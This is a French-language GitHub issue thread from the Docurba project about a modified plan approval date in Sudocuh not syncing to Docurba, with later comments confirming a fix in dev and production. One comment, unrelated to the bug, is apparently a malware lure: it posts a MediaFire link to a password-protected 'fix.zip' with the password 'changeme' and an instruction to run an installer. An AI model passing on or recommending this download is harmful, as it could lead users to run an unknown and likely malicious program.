### ISSUE TITLE
bug dump ? - la *modification* d'une date d'évènement renseignée sur Sodocuh n'est pas msj sur Docurba 

### ISSUE THREAD

**Issue by CeliaVermicelli** [MTES-MCT/Docurba#776]
J'ai dû changer dans Sudocuh la date d'approbation de la 1ère RG PLU  de Brouilla 02/07/2024 au lieu du 28/06/2024 dans Docurba la modification de s'est pas effectuée.

[lien FRP Brouilla ](https://docurba.beta.gouv.fr/frise/6958c1b1-b679-4867-9a7e-968415e51c50)

<img width="1315" alt="Capture d’écran 2024-08-26 à 4 12 10 PM" src="https://github.com/user-attachments/assets/16c6a6ca-3a2d-4b0b-af69-1a2aedc62902">
<img width="797" alt="Capture d’écran 2024-08-26 à 4 11 59 PM" src="https://github.com/user-attachments/assets/ec91b083-b14c-4b7b-a8cf-86ff10681c57">

To do Célia : 

- [x] prévenir Marie L. de la DDT 66

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lerayj** [comment]
Mémo manual fix waiting for batch fix cas 1

**Comment by CeliaVermicelli** [comment]
QA en dev : c'est ok 

<img width="1223" alt="Capture d’écran 2024-09-16 à 1 02 58 PM" src="https://github.com/user-attachments/assets/abf9708d-8eb8-4254-bc41-133a78bbf968">

**Comment by HermanceGauth** [comment]
@CeliaVermicelli idem ça m'a l'air ok en prod, je te laisse closed et prévenir
